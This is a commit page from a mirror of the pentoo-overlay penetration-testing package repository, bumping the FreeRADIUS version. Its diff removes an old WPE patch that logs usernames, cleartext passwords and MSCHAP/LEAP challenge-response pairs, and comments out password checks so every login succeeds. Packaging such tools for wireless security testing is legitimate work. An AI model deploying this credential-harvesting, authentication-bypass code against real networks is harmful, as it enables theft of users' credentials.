Backup_Repos/pentoo-overlay
1
0
Fork 0
mirror of https://github.com/pentoo/pentoo-overlay synced 2026-05-08 12:30:44 +02:00
Code Issues Projects Releases Wiki Activity

freeradius: version bump, updated wpe patch, cleanups

Browse source
This commit is contained in:
Anton Bolshakov 2014-05-18 14:50:12 +00:00
parent de6ebb1108
commit b0113365b8
15 changed files with 712 additions and 928 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
net-dialup/freeradius/Manifest
View file

@ -1,20 +1,16 @@
AUX clients_wpe.conf 390 SHA256 ecc817541c5f49ef6a2ddaf87f5f87b760776375a4239aaa618d48b36e4c2497 SHA512 faf5c788187851cc74415fb790afd6cc753ceb3d9e7d838e022212e78d205ca5f7251389ee5aff5f40fa8141cd2a8dd2dc62fc9088a356fd7ed636923493151d WHIRLPOOL bb21e49aced897cea608d43ea9218ef0868c30150b330b7bd5c881ebf1473cce89ea5f5412b8dd8331ffb22cd4a4e562f5e639adf8bb7cc897273e53765cbeee
AUX eap_wpe.conf 5594 SHA256 2ab71bc501bf0f9b1e09e3a97db23c291672b3ae01f15beb4be2b71ceedc4111 SHA512 abd21acba79497803e00d4cad6cc7ff0ac643b70cad42ee6b7bc9a9f0a7a54e6eb958d5d723e3927af908c1d26c78d2d249ec349445a15f5a498e52e6f1ecf51 WHIRLPOOL 4c2a6d7b636e8df65f3c7f3abd623dd05ecd198278d640908b4b95ccc8aedd0d7a719409b73acd1893937a2da54082957643856b32c2e04d06e44ab347bec0f7
AUX freeradius-2.1.11-wpe.patch 13697 SHA256 f56257eea5b228c096e781f6aded15f969bc6f7079a53fb73538988593c20649 SHA512 9fc717eaa66ddd60f5454c13e38b949e9649dd1f83e702c9ed8efef54e9b1a5df7077a9ea3e7afa7d17a640336bf0e3f108f4b25a67402cfc534e5029337dba2 WHIRLPOOL 02d645ad864c9c1afc5d1a1d716fa34548ae92c8d24e88c19ecccb703c168f1438b897d7057eefa7f15cfc8bafd6196f144bcbccf65ceafe6d73c74a868e548a
AUX freeradius-2.1.12-pkglibdir.patch 2555 SHA256 e0b0444d2ecd30518ad00df3d8744ae64adf6bab640bae977b31e0220614b5dd SHA512 4c9681fd5f6f843eb01346b273b34896412b37d6fe7cc4e6e563ebc8e919369da0f753e52fc23ba50ba58e06ba4ef5b8bb351d478972526c377b8c7900d5105a WHIRLPOOL a42ddbac304429dc013bcf174fcd5cb9d16c181d72557ba0efaea2aee3af9023ce799c5c1d8d8c0c4cc0d19bb39c03c2fb9e38d5fa00c6d881183127dc50dd2c
AUX freeradius-2.1.12-qafixes.patch 3716 SHA256 f50a79b94f87a06330c95a77018e32e3ddff290d3b56a1260a637d8283476580 SHA512 76130b3afcd5e11492e04f60a1e8a5a4f5cc37f594640b36194b48eb6a514cfd3d142a6f67eb171ff69a9e02ada877f5fe0302f589724a3bdd5e04bec8fbbb9c WHIRLPOOL 4d5352d88e262acd7ab17c06b75aaafbc00a24eab4b51fdfad735c0d17bb818cd74dbffa26289965ec0ebe69cefc7d269516575995cf1dc6f236cf53ed5f485a
AUX freeradius-2.1.12-ssl.patch 583 SHA256 e7a348ad24de18f5299c2d0544d6a8ed25913a00955c2bdb108d763163b38fab SHA512 aed2dbe6207d23069910dbb330af560e61cc36bb7827552af8ec2560101255ac5ffbd9c2817e964024ea6a6517fd415fc5d3e9c4c0c12282dcdf4adfafdd8727 WHIRLPOOL 32bb834f4585769326a254642c2cad1b254e8659659889010407f26483bf747aafffd77a788556d5ad1678ff4c8ebf560cd9801ad8ce11c3f7c070bde984a930
AUX freeradius-2.1.12-versionless-la-files.patch 2408 SHA256 edf8a85096492b36e9c1c1e48aea733d5134c44c789621dce948c36227549e74 SHA512 e0b465985538f9a3de2b8254e0d8e177fa6a8d4b2e483b44618f9e0fbc03b068eb61638c00e22e6be22fda3e2b74212c9e7dde223b1621836b6bea2aa9a5c616 WHIRLPOOL e223943de35b9d8b068eb6c84b2832a04613a467bbcb0fa7925aa4adfe506cd3bc30fe0acc4b546be549d88468a1d8e8139b9b4d25a5c3e27de7202ca9eef3e6
AUX freeradius-2.1.12-wpe.patch 14500 SHA256 0d0f8e7ac76b0e17603d677bb94588a07111f778809ef66583423c5d0852167f SHA512 5c5a6839eed1004d436c9d42a7a3a595e86e4832bbe952e8001d6dd5686b2ed311484f845841c18e7dd258c611b5ada1a11816516ad1fa8ab51d1231d12586e3 WHIRLPOOL 76bb59224b705994249874029cf0709334aac05054a4898af026e341002aff17745072c832e3b6363d278db210b0addfa7bf4fdb59ad99f00772790703929817
AUX freeradius-2.2.0-wpe.patch 14500 SHA256 0d0f8e7ac76b0e17603d677bb94588a07111f778809ef66583423c5d0852167f SHA512 5c5a6839eed1004d436c9d42a7a3a595e86e4832bbe952e8001d6dd5686b2ed311484f845841c18e7dd258c611b5ada1a11816516ad1fa8ab51d1231d12586e3 WHIRLPOOL 76bb59224b705994249874029cf0709334aac05054a4898af026e341002aff17745072c832e3b6363d278db210b0addfa7bf4fdb59ad99f00772790703929817
AUX freeradius-2.2.5-gentoo.patch 3459 SHA256 73dc67b4a59f93b70750c6dff3c92ffca6dd737e151c632dbee50badf2810b11 SHA512 eb51c40828b1f423755f0cf69dbb0df920ee01321ba90b0c02ad1b73a40e0dd56a47ee3bb7b9644fe2488df6384668d2f0e284fc450cc3f84e3b4db262b53d12 WHIRLPOOL ab077890ad747083a9d5cf3de303aab48fd6f2384750f1c5ba977a15c6a9ae7fa5f6ccb40534f766fc2541cc836b6aef02afec6260231f9da8b25935ff3d06f5
AUX freeradius-2.2.5-wpe.patch 15306 SHA256 a0a07d21823d96c70b6e6646fffbff38dd253b2cea7b8e1b5c70747bba66f8fb SHA512 fb987db478a39479c4eb172da45eb07c44974b2a626797fc11011f6cc9b80d90051ff75cd01d466ae32cfa996f5d3dc9aa2b229e7d4b741eb8218087c1fa1ab9 WHIRLPOOL 542325a146a9f253d68a9529d9e05c7fe0ec1a81d281777945b26f6a4f832d4aca3716b00e0bbb66c6747c75a8c0a63c4338dcbf52b501d994b1e803f9d26654
AUX radius.conf 129 SHA256 2d5b3e1af1299373182f2c8021bdf45c29db5d82b0a077b965a16ded32cb6292 SHA512 e248159c0a44f722e405c51c8015d9ad672e42ad0d38ca28f8a051ff911aa4d3e630b9bd4543e9d610940bc4ae50c022594e219ce341b36abe85c572acad418b WHIRLPOOL c409c0a928e01045f1a60aab7e24ba2ef1645a94ac120cddc6a05b39b0b2dd0e79e50bb40d68ff9ec31aa8d1173c4f2d6f626376eda7d07fc47fc491d8f2bbcf
AUX radius.conf-r3 345 SHA256 992331df42b77fe2b38fc6d715cfe0bc8d0d874fdcbbd510c9c99c85a77e6285 SHA512 353cb99bdb1c055b1590d34a4e148852de2b46f0c6292c88d1aad8c69eaaee6006e249eca79cd28dcd7690721f2ab65524f39c9015e714b10c439d343b7bf307 WHIRLPOOL 2f947c9728c7134cd8068933dd1784bfd1c39f15fa1d76f6e1c0d38087093399fe53a2a4e17b81413eb497f162ed69f19cd44129f34baa19ca2a347eaef6f9d9
AUX radius.conf-r3 467 SHA256 f76dd3c55117611d636f7fb645e98c58ae733f33cd9ba54a54075368625ddaae SHA512 b28bf4c22e72a3074aba79f7edeb48b69cc0e7671f7023e8888846dec6db4a428c6d1a0803b714fd9b9b3f45bbc1bad93cfa7911d716a856505da043c1f9c6d5 WHIRLPOOL d6e6847fa3aa45e8cb9ba370eaa8f1df33e3b29e121392369e251a71543c21413940fae2bca5d75553d0d91bc06541f00df301171ad9b3a6dc20f481d87e9e99
AUX radius.init-r1 1575 SHA256 5f20b72e4b627442313818cbe3c31cadfdc747fad18cacdafe58de62812eea41 SHA512 25c9cec70befd126bc5d324e802ecdf2ad940478edab55cb4384f0392690cade2fa2735c1eb18d990616c3d506b470c9007292192baf7a11ffe67b79c2e6df3b WHIRLPOOL 62e0b177a62b5248494f39baedd7ed65b6b8c10d2b872bd11a0c075b8d55069e890e4c92816b8fb6a4f6abc1234eea3235f1cb4a465ad59099f6f9fdd799a0d3
AUX radius.init-r2 1358 SHA256 8a3d7d571985aef8c16c19a8b57bb7e1e2c7cf5dcfb24da421ce4bd241c5a001 SHA512 21265b729f1080a59805ac186280a4ad2cc2a26d56636b1969197ebbdf0a0fd471da31805ca9ce1e18693e90522a610ff95ec743a39f3a2b73e33ac3ee19a0da WHIRLPOOL 1b6fc4b3d55f6e69c04ea837510737e98744165f516b3bd582ee598221988dd8704e8f66781c9fa9c46d18cbb69b1c89afc79f2b48e047fb07fa592c8419c0c1
AUX radius.init-r3 766 SHA256 de9ec9dffa5eaccd40668ea85fff5c655000539582d1e78c96069b0cd071c813 SHA512 4f0257eadf642041b2dd762c8e175be82e2844362ebe0806cc9c78b074143ef1cd5dea2b644241f7b5b88a7d80e860720d39dd6d428d9c8de756ca071a1ca2fb WHIRLPOOL 42782b5912d3374dac703e9cbb37361eb4e737a6cb33121a249811c4955954f5e8523da1ac6ffcac4bd0cc90585056c47a9b2a5dde7ca1dcea21fb8e6fe506df
AUX radius.init-r3 846 SHA256 689adb714ab16e6eef62ddced777b9b9158b0e5f19e903f8d1b7d59666580b31 SHA512 4de0955ec901a8eb3f6e32ebcf9cdfd662135d4ab4b4ba70f8d79717e99bc71a337a4f5b89d4c116c9e3c168d79a181ef09bdafb3edbabb59f35852de1b736b7 WHIRLPOOL afcee9c9c24b20e6d2fc6966abe521783c69c27cbce74d4b8bd8f9753b5b646722bffe675602358a956d96d902d962037852274cf019d38e3c72c5882bd6235e
AUX users_wpe 99 SHA256 922a318e7f66b3b52b4a1cc53d765ff116567f010d9ce4784b4ae009fe97ca73 SHA512 8d533b6a4d3a2622ae5f2d768946840ddd49001cc0d34cb571da6123232d1987abcd3cb39a05e0ac20e680b7d9b910586532c39a9ef1af677bade856d2201fe0 WHIRLPOOL 2c2b1c27c7a8407c264425756ea386d56f8be647993ec86e26f892c97b87b7c4770651c4aa7032cfd6834d34d9f5ca708affb759d3e9e671b4a4e0f679448c64
DIST freeradius-2.2.0-patches-4.tar.xz 3140 SHA256 9fd7b6f7e1501d63a073e6279b20eb6d8154e7898d81c85a5c548543ab33c1af SHA512 38ebd65d9ad8ce8f513f2f5c7fd9ff43b81cf468038a49f9eb7f4a54d13783e88866c3031e7abc0fc8b65d2aec4f347efa358b9e7e2aadb2d15567ce7e125d1d WHIRLPOOL a532444f6bfebe260a6b4bf43157fa1624ce9920a86635172ac94e0f757263904bac6ca6a472e12df73e32a8d25d6f7b094272bd743d13c566f23bfcbff6df27
DIST freeradius-server-2.1.12.tar.gz 4257106 SHA256 e597567c81ddbee385df8f076162c868ee6db5bf446c45ace94078c0c7d53805 SHA512 543ca20faa5ab2c45d7e0c9627c2860ac6eb2d1e3e920beffad612bb4a50a3ae65fe8f20a385541bca75ba05575091168de22c9c245f6869ecd5c862e6686189 WHIRLPOOL 88b8584fc8f27cfca99ec4a51ac77b653d0fa258aa80ccdd5d928893ec7a43c9c3db6a4e4716cc16d8da7dbbae64272862adba8ba3ba0558f1819996db42e5be
DIST freeradius-server-2.2.0.tar.gz 4289865 SHA256 ac22eefe7bd7c1c2b4de28613e628fd3e9ccae08a00a103e5f75aac0927bf009 SHA512 8652d27a292c3a8627c13b0bf12b829d3f2c50d82ed85eb342d1ec5c84ceabf8963907d50464a5907d2934f1b069a491411b1d5129efaaecefe4a30251b2b607 WHIRLPOOL 9f7dc926da7a33bfb425cb668bc9cf940a7a2dafa2a73ba8847a15f0d725476fdb4afc41963426ade9175709007f6f72892c3e9cd33d82c6601f57b873f92471
EBUILD freeradius-2.1.12-r1.ebuild 5010 SHA256 8403de3b937bf12436018207aee10d8004590c6aa5ccdcb01ae1297b17a10161 SHA512 042a2b6226fcc5a18be6dd51f36b0a530393769edb33c4290dcbc267730e418518c8d9c73d45b1f2db52b3a65c12361bb60f3a0b9f98ceb1e054e20c26f646e7 WHIRLPOOL 4f374cab928bc51fb319c319f63c6278d9d0cea0a320a57ca5eef260550da0a6651a9c99ef5471bf04f90b01d03228251769470e87bcb791e21587487ead5da6
EBUILD freeradius-2.2.0-r1.ebuild 5660 SHA256 cd4340c2ea561ef887bad4909f9d9123054e99b2ecc74cbc9c95f08b6d7e3077 SHA512 91f13c4870f4654aec3e5561cc065ce124da29f1de7b068a09c66e799a95959b533aa15c3f15beb52c5823d2fd12a8fa42a00bd3bb8c0422891b793a04d03b3e WHIRLPOOL 79c431ea8846095302fd24d3db46392b884a8423092a2578e0c72ef85f74aa45c470e67880fb2186b41dd41e3640f765254361d4dd758810f78d0001e2bf347e
EBUILD freeradius-2.2.0.ebuild 5016 SHA256 f00c09d7a97504f40836ac225f399d7ccb550a0a4c7ec8d56d2ca520e101f2b6 SHA512 bf2893460db3676ec12f2405544bf6fc68f488df73ac2d7a7bc31c802bf367a86579cfc4632befa5597600dbe4a1dad2333b24b661babe9e6faa6abae695fd91 WHIRLPOOL c87907ce9cc0df6e6105cfea5f60c9407f78c198325616f3a43042cdb9cfdc1c24725103b3e61499fc3e7032f13a53dc9bfdc91dbca542547f4a7231e89c3047
DIST freeradius-server-2.2.5.tar.gz 4415950 SHA256 8c4c2a0b600a8d85d2235589a5e80d4fefd1f52317e9daf8193731566fa9d012 SHA512 511599b4f4f5906441d0cda61946341f2226b9aae69b6f68b03a19898b6385499a8221933c191232d50f736cab93f0f6f271e4defe4552e7738cb21e2415f053 WHIRLPOOL 629ac42749b736a7cd606c97fb149ea6f3b11d0e77bc5fc69785e4c7956f073131eb16420f276de5664e977a37a6784d0bbff08a15c1c23389f5369320a4cb12
EBUILD freeradius-2.2.0-r1.ebuild 5652 SHA256 e048598022d412fc584c1349135e7e2745faa0b2797c32858131b7bae4ef13fa SHA512 8622ff12478c2156a4fb35d3ec0c7573fc465f829128d65171ac55fdffa7e4dfbfe5f4885d977c128415ac3d0cbb3ca2497102fe9633b31595d0d4d028a806da WHIRLPOOL 786530803a63722bb87de139c3b2e964c5f13b9ed8dfedcd4632d82adcc3ddc560413ae4c9dea10b7f3839bfe94cd40b8eaa5c37a36125c9916ad52f8f640e66
EBUILD freeradius-2.2.5.ebuild 5445 SHA256 3196c13e74419dad4e340e3c05ad3e2f57fb803b0f07c0063582cbfe61616a78 SHA512 9da0d1db9ad7a46609fcc3181644aa0db00ef9049eb51911ffc35b8e2d25a6b3a29f17f6989873dafe30d15178e3d99815b9867202ec4fb34437ff97ce593e35 WHIRLPOOL 1f329b78ff0283c7830819e62d32a2b4e80756c48e7a39db1f3f865860592b5a94f2fe5eaf7cbae74fcaa59724cb08c1d5fc804abd947c5f4990eb8bc62a1d08

364
net-dialup/freeradius/files/freeradius-2.1.11-wpe.patch
View file

@ -1,364 +0,0 @@
diff -uNr freeradius-server-2.1.11-orig//raddb/radiusd.conf.in freeradius-server-2.1.11-wpe//raddb/radiusd.conf.in
--- freeradius-server-2.1.11-orig//raddb/radiusd.conf.in 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//raddb/radiusd.conf.in 2011-09-28 08:11:09.334011116 -0700
@@ -466,6 +466,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -uNr freeradius-server-2.1.11-orig//src/include/radiusd.h freeradius-server-2.1.11-wpe//src/include/radiusd.h
--- freeradius-server-2.1.11-orig//src/include/radiusd.h 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/include/radiusd.h 2011-09-28 08:11:47.402010538 -0700
@@ -368,6 +368,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -uNr freeradius-server-2.1.11-orig//src/main/auth.c freeradius-server-2.1.11-wpe//src/main/auth.c
--- freeradius-server-2.1.11-orig//src/main/auth.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/auth.c 2011-09-28 08:13:26.638011007 -0700
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -uNr freeradius-server-2.1.11-orig//src/main/log.c freeradius-server-2.1.11-wpe//src/main/log.c
--- freeradius-server-2.1.11-orig//src/main/log.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/log.c 2011-09-28 08:15:24.746011013 -0700
@@ -28,6 +28,9 @@
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
@@ -181,6 +184,55 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+ }
+
+
/*
* Dump a whole list of attributes to DEBUG2
diff -uNr freeradius-server-2.1.11-orig//src/main/mainconfig.c freeradius-server-2.1.11-wpe//src/main/mainconfig.c
--- freeradius-server-2.1.11-orig//src/main/mainconfig.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/mainconfig.c 2011-09-28 08:16:13.782011003 -0700
@@ -232,7 +232,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
-
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-09-28 08:18:03.338011000 -0700
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-09-28 08:18:28.462010992 -0700
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-09-28 08:19:11.958011003 -0700
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.11-wpe//src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_mschap/rlm_mschap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_mschap/rlm_mschap.c 2011-09-28 08:09:38.470011004 -0700
@@ -662,9 +662,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -679,9 +681,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE - always succeed
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1131,7 +1135,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1240,7 +1244,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2007-11-23 07:58:12.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2008-02-15 19:37:35.000000000 -0500
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
- if (memcmp(output, packet->value, 16) != 0) {
- return 0;
- }
+ //WPE - always succeed
+ //if (memcmp(output, packet->value, 16) != 0) {
+
+ //return 0;
+ //}
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -ru freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c 2007-12-28 23:38:19.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c 2008-02-15 19:37:35.000000000 -0500
@@ -473,6 +473,10 @@
return RLM_MODULE_NOOP;
}
+ /* WPE */
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
+
/*
* Can't do PAP if there's no password.
*/
@@ -604,6 +608,8 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE - always succeed */
+ /*
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -611,6 +617,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -643,10 +650,13 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -670,10 +680,13 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -692,10 +705,13 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -716,10 +732,13 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -741,11 +760,14 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -765,16 +787,21 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+/*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+*/
goto done;
break;
diff -crB freeradius-server-2.1.7/src/include/radiusd.h freeradius-server-2.1.7-wpe/src/include/radiusd.h
*** freeradius-server-2.1.7/src/include/radiusd.h 2011-11-05 09:44:19.347294768 +0800
--- freeradius-server-2.1.7-wpe/src/include/radiusd.h 2011-11-05 09:49:42.750274303 +0800
@@ -546,6 +546,7 @@
__attribute__ ((format (printf, 2, 3)))
#endif
;
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen);
int log_debug(const char *, ...)
#ifdef __GNUC__
__attribute__ ((format (printf, 1, 2)))

61
net-dialup/freeradius/files/freeradius-2.1.12-pkglibdir.patch
View file

@ -1,61 +0,0 @@
diff -Nru freeradius-server-2.1.12.orig//Make.inc.in freeradius-server-2.1.12/Make.inc.in
--- freeradius-server-2.1.12.orig//Make.inc.in 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/Make.inc.in 2011-11-20 13:04:20.000000000 +0100
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@
diff -Nru freeradius-server-2.1.12.orig//raddb/radiusd.conf.in freeradius-server-2.1.12/raddb/radiusd.conf.in
--- freeradius-server-2.1.12.orig//raddb/radiusd.conf.in 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/raddb/radiusd.conf.in 2011-11-20 13:04:20.000000000 +0100
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
diff -Nru freeradius-server-2.1.12.orig//src/modules/Makefile freeradius-server-2.1.12/src/modules/Makefile
